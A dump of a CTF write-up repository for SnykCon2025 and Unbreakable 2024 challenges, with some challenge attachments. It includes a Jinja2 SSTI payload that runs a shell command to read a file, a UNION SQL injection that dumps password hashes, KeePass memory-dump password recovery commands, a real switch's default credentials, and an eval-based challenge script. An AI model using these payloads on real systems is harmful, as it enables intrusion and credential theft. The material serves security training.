Cyberchef: 13 | 14 | ![image](https://github.com/user-attachments/assets/72609ff9-86ef-4a53-afc3-c77ac8bb3713) 15 | 16 | Now that I know the secret password, I give it to the binary and get the flag: 17 | 18 | ![image](https://github.com/user-attachments/assets/500c007f-183a-438b-bb1f-36d8cef4c30a) 19 | 20 | flag{f074d38932164b278a508df11b5eff89} 21 | -------------------------------------------------------------------------------- /SnykCon2025/Rev/Math_for_Me.md: -------------------------------------------------------------------------------- 1 | # Math for Me 2 | ![image](https://github.com/user-attachments/assets/18e93b6e-2de7-409f-81cb-dee57c13a725) 3 | 4 | Attachment: [math4me](https://github.com/LazyTitan33/CTF-Writeups/raw/refs/heads/main/SnykCon2025/attachments/math4me) 5 | 6 | ## Writeup 7 | 8 | I decompiled the binary and gave the code to chatGPT asking it to solve it for me. Cause I'm lazy. 9 | 10 | ![image](https://github.com/user-attachments/assets/d06c05e2-c946-4543-ace5-08f6f7e576b3) 11 | 12 | This AI is getting better every day. I was surprised to see it was right. I was very sure it is lying to me. 13 | 14 | ![image](https://github.com/user-attachments/assets/e517f618-b2ab-4c31-b3ee-396465eb89c4) 15 | 16 | Another way to get the flag, in a less dumb way, would be to patch the binary, just like I did in [Rock Paper Psychic](https://github.com/LazyTitan33/CTF-Writeups/blob/1c001163cb7482bba6c23b94f5f6e929eb9cda40/Huntress-CTF-2023/Misc/Rock_Paper_Psychic.md) where it is making the check for the special number: 17 | 18 | ![image](https://github.com/user-attachments/assets/613d07dd-7f6a-48f6-97fe-59152119bfa9) 19 | 20 | Now that I changed the JZ to JNZ, I can pass any value: 21 | 22 | ![image](https://github.com/user-attachments/assets/d253f5f0-02c5-400a-93aa-0e4c5e48d00b) 23 | 24 | And get the flag: 25 | 26 | ![image](https://github.com/user-attachments/assets/320823a7-03b9-4019-87d5-c0f59c08b0b6) 27 | 28 | flag{h556cdd`=ag.c53664:45569368391gc} 29 | -------------------------------------------------------------------------------- /SnykCon2025/Rev/letters2nums.md: -------------------------------------------------------------------------------- 1 | # letters2nums 2 | ![image](https://github.com/user-attachments/assets/48bf9194-8a62-40ff-a1e4-2aedc3410d57) 3 | 4 | Attachment: [encflag.txt](https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/refs/heads/main/SnykCon2025/attachments/encflag.txt) [letters2nums.elf](https://github.com/LazyTitan33/CTF-Writeups/raw/refs/heads/main/SnykCon2025/attachments/letters2nums.elf) 5 | 6 | ## Writeup 7 | 8 | I was doing multiple challenge at the same time at this point and I wasn't very interested in the Rev category so I just copy pasted code from the binary after decompiling it in Ghidra and asked chatGPT what it sees: 9 | 10 | ![image](https://github.com/user-attachments/assets/ac3b8c7c-9907-4738-b94c-34fbf6c42a01) 11 | 12 | It very nicely gave me working code from the first try: 13 | 14 | ```python 15 | with open("encflag.txt", "r") as f: 16 | encoded_numbers = [int(line.strip()) for line in f.readlines()] 17 | 18 | decoded_flag = "" 19 | for num in encoded_numbers: 20 | char1 = (num >> 8) & 0xFF 21 | char2 = num & 0xFF 22 | decoded_flag += chr(char1) + chr(char2) 23 | 24 | print("Decoded flag:", decoded_flag) 25 | ``` 26 | 27 | flag{3b050f5a716e51c89e9323baf3a7b73b} 28 | -------------------------------------------------------------------------------- /SnykCon2025/Warmups/Screaming_Crying_Throwing_up.md: -------------------------------------------------------------------------------- 1 | # Screaming Crying Throwing up 2 | ![image](https://github.com/user-attachments/assets/cd4974a9-4119-49aa-b18e-93328da37cc2) 3 | 4 | Attachment: [screaming.bin](https://github.com/LazyTitan33/CTF-Writeups/raw/refs/heads/main/SnykCon2025/attachments/screaming.bin) 5 | 6 | ## Writeup 7 | 8 | The title of the challenge as well as the description points us to the [scream cipher](https://github.com/matthewpwatkins/scream-cipher). We can use [this](https://scream-cipher.netlify.app/) online tool in order to convert our payload. 9 | 10 | However, it is important to open the file in a proper text editor. When read from a powershell terminal or bash, the strange characters are not outputted correctly and won't decode to our flag. I opened it in Sublime Text: 11 | 12 | ![image](https://github.com/user-attachments/assets/ce7243a8-270a-4aa9-8ec5-605018e3e086) 13 | 14 | Now I can "translate" it and get the flag: 15 | 16 | ![image](https://github.com/user-attachments/assets/42d20707-5bc1-44e8-8db6-e78acd0ac6ef) 17 | 18 | flag{edabfbafedcbbfbadcafbdaefdadfaac} 19 | -------------------------------------------------------------------------------- /SnykCon2025/Warmups/Zero_Ex_Six_One.md: -------------------------------------------------------------------------------- 1 | # Zero Ex Six One 2 | ![image](https://github.com/user-attachments/assets/2fb01f42-dca8-4ae2-8813-fa5b75a09d52) 3 | 4 | Attachment: [flag.txt.encry](https://github.com/LazyTitan33/CTF-Writeups/raw/refs/heads/main/SnykCon2025/attachments/flag.txt.encry) 5 | 6 | ## Writeup 7 | 8 | The challenge description tells me to XOR the file that I was given: 9 | 10 | ![image](https://github.com/user-attachments/assets/173c85dc-9e88-4d03-acde-8590a395e4b9) 11 | 12 | The key is the title of the challenge, sneaky. 13 | 14 | flag{c50d82c0a25f3e644d0702b41dbd085a} 15 | -------------------------------------------------------------------------------- /SnykCon2025/Web/Plantly.md: -------------------------------------------------------------------------------- 1 | # Plantly 2 | ![image](https://github.com/user-attachments/assets/28fe5509-c381-4cf6-ad85-bf12b63b0b34) 3 | 4 | Attachment: [challenge.zip](https://github.com/LazyTitan33/CTF-Writeups/raw/refs/heads/main/SnykCon2025/attachments/plantly.zip) 5 | 6 | ## Writeup 7 | 8 | I get a pretty website about plants: 9 | 10 | ![image](https://github.com/user-attachments/assets/74c1ff9a-4ba0-4760-9c07-980529103767) 11 | 12 | From the source code, I can already see the potential for SSTI as unsanitizied user input is passed to `render_template_string`: 13 | 14 | ![image](https://github.com/user-attachments/assets/c9c2fdf5-cf9e-4f9a-9186-5c02ad48027f) 15 | 16 | After registering an account and logging in, I place a custom order with the standard SSTI `{{7*7}}` payload: 17 | 18 | ![image](https://github.com/user-attachments/assets/a9135ec0-a569-407c-b55f-54a6f085e309) 19 | 20 | I go through the shopping flow and print out the receipt confirming SSTI: 21 | 22 | ![image](https://github.com/user-attachments/assets/26e73620-03df-495e-be5a-68f0751738b3) 23 | 24 | I have exploited SSTI plenty of times, so I had a [payload](https://www.onsecurity.io/blog/server-side-template-injection-with-jinja2/) ready that bypasses multiple types of filters: 25 | 26 | ```text 27 | {{request['application']['\x5f\x5fglobals\x5f\x5f']['\x5f\x5fbuiltins\x5f\x5f']['\x5f\x5fimport\x5f\x5f']('os')['popen']('cat /src/flag.txt')['read']()}} 28 | ``` 29 | ![image](https://github.com/user-attachments/assets/1a485b28-4f0c-41ed-a6a3-bf8bd8b223d2) 30 | 31 | flag{982e3b7286ee603d8539f987b65b90d4} 32 | -------------------------------------------------------------------------------- /SnykCon2025/Web/TimeOff.md: -------------------------------------------------------------------------------- 1 | # TimeOff 2 | ![image](https://github.com/user-attachments/assets/42a19e34-1933-4b47-bcfc-0ce53de65ba4) 3 | 4 | Attachment: [challenge.zip](https://github.com/LazyTitan33/CTF-Writeups/raw/refs/heads/main/SnykCon2025/attachments/timeoff.zip) 5 | 6 | ## Writeup 7 | 8 | This website allows me to make a request for time off. It's a POST request that also allows me to upload a file. However, the file_name parameter is vulnerable to Path Traversal according to the [Snyk](https://docs.snyk.io/scm-ide-and-ci-cd-integrations/snyk-ide-plugins-and-extensions/visual-studio-code-extension) Extension for Visual Studio Code :wink:: 9 | 10 | ![image](https://github.com/user-attachments/assets/5e5cfc48-5281-42fb-9513-98d1c03fdbad) 11 | 12 | So I just read the flag from the path indicated in the Dockerfile: 13 | 14 | ![image](https://github.com/user-attachments/assets/54298171-30e3-472c-a941-bcb32b7732f1) 15 | 16 | The 302 redirect will lead me directly to the flag: 17 | 18 | flag{52948d88ee74b9bdab130c35c88bd406} 19 | -------------------------------------------------------------------------------- /SnykCon2025/Web/Unfurl.md: -------------------------------------------------------------------------------- 1 | # Unfurl 2 | ![image](https://github.com/user-attachments/assets/71cefee1-9863-4208-beb9-cfe01ee53cea) 3 | 4 | Attachment: [challenge.zip](https://github.com/LazyTitan33/CTF-Writeups/raw/refs/heads/main/SnykCon2025/attachments/unfurl.zip) 5 | 6 | ## Writeup 7 | 8 | In the source code I can see that there is a filter for the clientIP to ensure only the localhost would access it: 9 | 10 | ![image](https://github.com/user-attachments/assets/891bf57d-9aa6-48e7-b699-c75c8c86bae1) 11 | 12 | This would give me command execution but it also means I need to find an SSRF vulnerability. The internal app is also running on a random port but we know the range which would make it easy to enumerate: 13 | 14 | ![image](https://github.com/user-attachments/assets/cff1474f-825f-4624-83f0-2843645e5459) 15 | 16 | The functionality of the website itself is basically just an SSRF, there is no filter that we need to bypass or anything. I've sent the request to Intruder specifying the port range we want to hit to find the internal app: 17 | 18 | ![image](https://github.com/user-attachments/assets/8b86dcb6-4fc5-4aa5-8749-a0593ed7dd18) 19 | 20 | I also used grep to find the request that has the flag: 21 | 22 | ![image](https://github.com/user-attachments/assets/e8a8eb0f-01c2-4b33-8dd3-b4149db51230) 23 | 24 | flag{e1c96ccca8777b15bd0b0c7795d018ed} 25 | -------------------------------------------------------------------------------- /SnykCon2025/Web/Weblog.md: -------------------------------------------------------------------------------- 1 | # Weblog 2 | ![image](https://github.com/user-attachments/assets/9f22e50c-d953-431d-8507-0936eeff49d7) 3 | 4 | 5 | Attachment: [challenge.zip](https://github.com/LazyTitan33/CTF-Writeups/raw/refs/heads/main/SnykCon2025/attachments/weblog.zip) 6 | 7 | ## Writeup 8 | 9 | I can quickly see a SQL Injection vulnerability in the source code on the `/search` endpoint: 10 | 11 | ![image](https://github.com/user-attachments/assets/cd7d7908-332a-420b-89c0-5a24c8f055f3) 12 | 13 | Using the following syntax, I can get the admin password hash: 14 | 15 | ```text 16 | ' union select 1,2,3,4, group_concat(username,password) from users# 17 | ``` 18 | 19 | ![image](https://github.com/user-attachments/assets/705da9ec-1673-4b2c-9759-d2845d9baf65) 20 | 21 | Luckily the hash is crackable and we get the admin password: 22 | 23 | ![image](https://github.com/user-attachments/assets/73d0d6ce-e838-4564-9015-12dea91287c5) 24 | 25 | In the source code, I can see that the admin can execute a command, there's an attempt at a filter in the DISALLOWED_CHARS: 26 | 27 | ![image](https://github.com/user-attachments/assets/bd48e98b-6033-4dea-980b-5e2f9c883475) 28 | 29 | It is, as expected, insuficient to prevent command injection: 30 | 31 | ![image](https://github.com/user-attachments/assets/376ecd78-5271-4ab7-a396-d019082347aa) 32 | 33 | And I have the flag: 34 | 35 | ![image](https://github.com/user-attachments/assets/ea6f1f2e-e925-43f6-bb0c-b53b2a9dcfaa) 36 | 37 | flag{b06fbe98752ab13d0fb8414fb55940f3} 38 | -------------------------------------------------------------------------------- /SnykCon2025/attachments/Padding_Gambit.7z: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/0841aee64688aa9e0cd0f5c46a7e9e51c55d345f/SnykCon2025/attachments/Padding_Gambit.7z -------------------------------------------------------------------------------- /SnykCon2025/attachments/an-offset: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/0841aee64688aa9e0cd0f5c46a7e9e51c55d345f/SnykCon2025/attachments/an-offset -------------------------------------------------------------------------------- /SnykCon2025/attachments/calculator.py: -------------------------------------------------------------------------------- 1 | import sys 2 | 3 | def simple_calculator(): 4 | print("Welcome to the Simple Calculator!") 5 | print("Enter a mathematical expression:", end=' ') 6 | expression = input() 7 | sys.stdin.close() 8 | try: 9 | blacklist = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ" 10 | for x in expression: 11 | if x in blacklist: 12 | print(f"{x} is not allowed!") 13 | exit() 14 | result = eval(expression) 15 | print(f"The result is: {result}") 16 | except Exception as e: 17 | print(f"Error: {e}") 18 | 19 | if __name__ == "__main__": 20 | simple_calculator() 21 | -------------------------------------------------------------------------------- /SnykCon2025/attachments/challenge.elf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/0841aee64688aa9e0cd0f5c46a7e9e51c55d345f/SnykCon2025/attachments/challenge.elf -------------------------------------------------------------------------------- /SnykCon2025/attachments/click.pcapng: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/0841aee64688aa9e0cd0f5c46a7e9e51c55d345f/SnykCon2025/attachments/click.pcapng -------------------------------------------------------------------------------- /SnykCon2025/attachments/crabshell: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/0841aee64688aa9e0cd0f5c46a7e9e51c55d345f/SnykCon2025/attachments/crabshell -------------------------------------------------------------------------------- /SnykCon2025/attachments/donutshop.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/0841aee64688aa9e0cd0f5c46a7e9e51c55d345f/SnykCon2025/attachments/donutshop.zip -------------------------------------------------------------------------------- /SnykCon2025/attachments/echo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/0841aee64688aa9e0cd0f5c46a7e9e51c55d345f/SnykCon2025/attachments/echo -------------------------------------------------------------------------------- /SnykCon2025/attachments/either-or: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/0841aee64688aa9e0cd0f5c46a7e9e51c55d345f/SnykCon2025/attachments/either-or -------------------------------------------------------------------------------- /SnykCon2025/attachments/encflag.txt: -------------------------------------------------------------------------------- 1 | 21608 2 | 26995 3 | 8297 4 | 29472 5 | 24864 6 | 27759 7 | 28263 8 | 8289 9 | 28260 10 | 8291 11 | 28526 12 | 30319 13 | 27765 14 | 25701 15 | 25632 16 | 30561 17 | 31008 18 | 29807 19 | 8308 20 | 29305 21 | 8289 22 | 28260 23 | 8296 24 | 26980 25 | 25888 26 | 29800 27 | 25888 28 | 26220 29 | 24935 30 | 14950 31 | 27745 32 | 26491 33 | 13154 34 | 12341 35 | 12390 36 | 13665 37 | 14129 38 | 13925 39 | 13617 40 | 25400 41 | 14693 42 | 14643 43 | 12851 44 | 25185 45 | 26163 46 | 24887 47 | 25143 48 | 13154 49 | 32000 50 | -------------------------------------------------------------------------------- /SnykCon2025/attachments/flag.txt.encry: -------------------------------------------------------------------------------- 1 |  TQYSQSTRWUUQVQSUPQYTk -------------------------------------------------------------------------------- /SnykCon2025/attachments/freeRangePackets.pcapng: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/0841aee64688aa9e0cd0f5c46a7e9e51c55d345f/SnykCon2025/attachments/freeRangePackets.pcapng -------------------------------------------------------------------------------- /SnykCon2025/attachments/idiotic.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/0841aee64688aa9e0cd0f5c46a7e9e51c55d345f/SnykCon2025/attachments/idiotic.zip -------------------------------------------------------------------------------- /SnykCon2025/attachments/its-go-time: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/0841aee64688aa9e0cd0f5c46a7e9e51c55d345f/SnykCon2025/attachments/its-go-time -------------------------------------------------------------------------------- /SnykCon2025/attachments/letters2nums.elf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/0841aee64688aa9e0cd0f5c46a7e9e51c55d345f/SnykCon2025/attachments/letters2nums.elf -------------------------------------------------------------------------------- /SnykCon2025/attachments/math4me: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/0841aee64688aa9e0cd0f5c46a7e9e51c55d345f/SnykCon2025/attachments/math4me -------------------------------------------------------------------------------- /SnykCon2025/attachments/plantly.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/0841aee64688aa9e0cd0f5c46a7e9e51c55d345f/SnykCon2025/attachments/plantly.zip -------------------------------------------------------------------------------- /SnykCon2025/attachments/screaming.bin: -------------------------------------------------------------------------------- 1 | a̮ăaa̋{áa̲aȧa̮ȧaa̮áa̲a̧ȧȧa̮ȧaa̲a̧aa̮ȧa̲aáa̮a̲aa̲a̮aaa̧} -------------------------------------------------------------------------------- /SnykCon2025/attachments/timeoff.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/0841aee64688aa9e0cd0f5c46a7e9e51c55d345f/SnykCon2025/attachments/timeoff.zip -------------------------------------------------------------------------------- /SnykCon2025/attachments/unfurl.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/0841aee64688aa9e0cd0f5c46a7e9e51c55d345f/SnykCon2025/attachments/unfurl.zip -------------------------------------------------------------------------------- /SnykCon2025/attachments/vulnscanner.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/0841aee64688aa9e0cd0f5c46a7e9e51c55d345f/SnykCon2025/attachments/vulnscanner.zip -------------------------------------------------------------------------------- /SnykCon2025/attachments/weblog.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/0841aee64688aa9e0cd0f5c46a7e9e51c55d345f/SnykCon2025/attachments/weblog.zip -------------------------------------------------------------------------------- /SnykCon2025/attachments/who-is-jh.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/0841aee64688aa9e0cd0f5c46a7e9e51c55d345f/SnykCon2025/attachments/who-is-jh.zip -------------------------------------------------------------------------------- /Unbreakable-Individual-2024/fake-add.md: -------------------------------------------------------------------------------- 1 | # fake-add 2 | 3 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/e2619114-d0d7-48d2-aebb-af89464d00a6) 4 | 5 | # Solution 6 | 7 | We can use [dogbolt](https://dogbolt.org/) to decompile small binaries and with this one, we find some interesting looking bytes in it: 8 | 9 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/31c424d8-1b3d-4957-b674-b518a6131aea) 10 | 11 | I've copied these locally: 12 | 13 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/2eb57967-4a73-443f-a553-3c381c1c48bb) 14 | 15 | Removed the null bytes: 16 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/27d2ec9d-564d-4575-897b-e2da0f45c3d6) 17 | 18 | Added the two HEX strings together and decoded the resulting string in Cyberchef: 19 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/bfc2c26e-205c-49bc-ba79-b959f1f7908a) 20 | 21 | We get our non-standardly formatted flag, but at least this time, it was mentioned in the challenge description: 22 | 23 | `CTF{th1s_is_ju5T_ADD}` 24 | -------------------------------------------------------------------------------- /Unbreakable-Individual-2024/improper-configuration.md: -------------------------------------------------------------------------------- 1 | # improper-configuration 2 | 3 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/3740cbd5-6aad-469c-845e-5201d5a61722) 4 | 5 | # Solution 6 | 7 | We can do some dynamic analysis on APK files by running the application in an emulator. An online one that I used is [appetize.io](https://appetize.io/upload) which allows us to see what the app does and if we create an account (I used a temporary email), we can also get network logs and more. For now, we just see the app saying to "check the rest in strings": 8 | 9 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/aa3c9420-52a7-4e30-b45a-6b0f1b8cd9e1) 10 | 11 | I've used [this](http://www.javadecompilers.com/apk) online APK decompiler that gets me the decompiled JAVA code, saved it locally and grepped for that initial weird string and found the app name. I could also see the app name in the list of apps in the emulator so I didn't really need to check the strings: 12 | 13 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/2600c45c-5e09-474f-a946-e49792a826c0) 14 | 15 | That's it, that's the flag: `wlwkfwo2-3cscase-wdc` 16 | 17 | Note: This was extremely annoying and frustrating as there was no indication in the challenge description that the flag is in a non-standard format. This was an absolute guess game. Incredibly horrible challenge. 18 | -------------------------------------------------------------------------------- /Unbreakable-Individual-2024/password-manager-is-a-must.md: -------------------------------------------------------------------------------- 1 | # password-manager-is-a-must 2 | 3 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/c438f29b-3e20-45b0-9b6c-3b86015e27a5) 4 | 5 | # Solution 6 | 7 | Running strings on the provided dump, we can tell that it's a proc dump of the `keepass.exe` process. 8 | 9 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/c60af534-41bb-484f-b008-1efbc58f44b4) 10 | 11 | We can clone the [keepass-password-dumper](https://github.com/vdohney/keepass-password-dumper) locally and run it on the dump file to get the password from it: 12 | 13 | ```cmd 14 | git clone https://github.com/vdohney/keepass-password-dumper 15 | dotnet run File.dmp 16 | ``` 17 | 18 | As usual with this method, the first 2 characters are not exact but can be deduced: 19 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/04ba0773-bc9b-403f-bb21-f6396613cdc7) 20 | 21 | Password: `thesecretpass` 22 | 23 | And we can now get the flag from the keepass file: 24 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/d7c82de5-f93e-48d8-9099-77de5245aea0) 25 | 26 | `CTF{c112b162e0567cbc5ae20558511ab3932446a708bc40a97e88e3faac7c242423}` 27 | -------------------------------------------------------------------------------- /Unbreakable-Individual-2024/persisten-reccon.md: -------------------------------------------------------------------------------- 1 | # persistent-reccon 2 | 3 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/98e09b8e-80c3-485f-8d50-f2e972f32820) 4 | 5 | # Solution 6 | 7 | With this challenge, we only get a generic looking login page: 8 | 9 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/06428772-2255-4b87-9455-70662516456e) 10 | 11 | However, this challenge had an `OSINT` tag associated with it so we screenshot the login and do a Google reverse image search: 12 | 13 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/c8b2c1f5-a6ca-4f1b-b876-a5b609bb870e) 14 | 15 | The first result mentions a `Westermo` product, clicking on it we can see a Lynx series switch: 16 | 17 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/7f58ead7-8dab-45d4-a7df-063fd80edf1c) 18 | 19 | We can google for the default credentials: 20 | 21 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/ac2ca6db-166b-43bb-9694-5de63cd95fa2) 22 | 23 | `admin:westermo` 24 | 25 | We try and use that and we get the flag: 26 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/4ed986d8-6cf8-4598-8de0-81d4e421b1d7) 27 | 28 | `CTF{7e33e33a06c53d77330b9621a62fd4f1915e6e695f3188aba62c6800695ee30e}` 29 | -------------------------------------------------------------------------------- /Unbreakable-Individual-2024/safe-password.md: -------------------------------------------------------------------------------- 1 | # safe-password 2 | 3 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/ca66ad51-b447-4700-aa7f-693c8909d6bb) 4 | 5 | # Solution 6 | 7 | This one gives us a leaked.txt file containing 150 passwords: 8 | 9 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/a361fea1-7872-4599-8ae5-46e86f1be329) 10 | 11 | I couldn't think of an easier way so I manually started looking up passwords from this list in the [Have I Been Pwned](https://haveibeenpwned.com/Passwords) password database. I started with the lower half which seems to contain easier to write passwords: 12 | 13 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/b54ace86-c5da-48b1-bed4-d24f9f6090e5) 14 | 15 | As per the challenge description, we are looking for a password that has been leaked at least 80 times before. We find that to be `Bubblegum123!`: 16 | 17 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/87164b5a-f2ae-4c17-a497-d1436cd96005) 18 | 19 | And we have our flag: `CTF{fdc852bc63a266c8c38db64bef90d62d53ddeef00aa85df7b941ac780b3d75d8}` 20 | -------------------------------------------------------------------------------- /Unbreakable-Individual-2024/secrets-of-winter.md: -------------------------------------------------------------------------------- 1 | # secrets-of-winter 2 | 3 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/cca5799a-4e08-4043-8ec3-b31157c41562) 4 | 5 | # Solution 6 | 7 | At least on this challenge, we know that the flag is not in the usual format: 8 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/cd8bba95-aa95-498f-9fbe-70dc05588198) 9 | 10 | Running `exiftool` on the image, we can find two base64 strings: 11 | 12 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/7eac7fe8-736b-4727-a319-4852f8e4043c) 13 | 14 | ```bash 15 | echo Y2g0bDF9|base64 -d 16 | ``` 17 | 18 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/a7e5d7cd-907c-4983-9f72-ee4331522858) 19 | 20 | ```bash 21 | echo ZjFuaSRoLXRoMy0=|base64 -d 22 | ``` 23 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/4722a2b6-2463-4c57-aad3-6a2f0acba2d2) 24 | 25 | So it looks like we have the last 3 words for now. I also ran [stegoveritas](https://github.com/bannsec/stegoVeritas) on the picture and it extracted all the different colored layers of the picture in a folder. I went through them several times looking for hidden characters/words, zooming in and out, until I found the beginning of the flag on a building off in the distance with very small font: 26 | 27 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/66baea36-9452-4ef3-92e0-f09f4e36783e) 28 | 29 | It's very difficult to see but we eventually build our full flag: `ctf{g3t-3xiftool-to-f1ni$h-th3-ch4l1}` 30 | -------------------------------------------------------------------------------- /Unbreakable-Individual-2024/start-enc.md: -------------------------------------------------------------------------------- 1 | # start-enc 2 | 3 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/b564bba6-7a47-40f1-a5a4-c9e36b390450) 4 | 5 | # Solution 6 | 7 | This one was very easy, we get a file with easily recognizable `Binary` content: 8 | 9 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/86e85972-0de8-4b2f-adcc-8eb9521cb2d8) 10 | 11 | We can use Cyberchef to automatically have it recognize each subsequent layer and decode it until we get our flag: 12 | 13 | `CTF{584b312bb5bb340e94085c43aba063c5b5a880391393baecf737d87246696cb7}` 14 | --------------------------------------------------------------------------------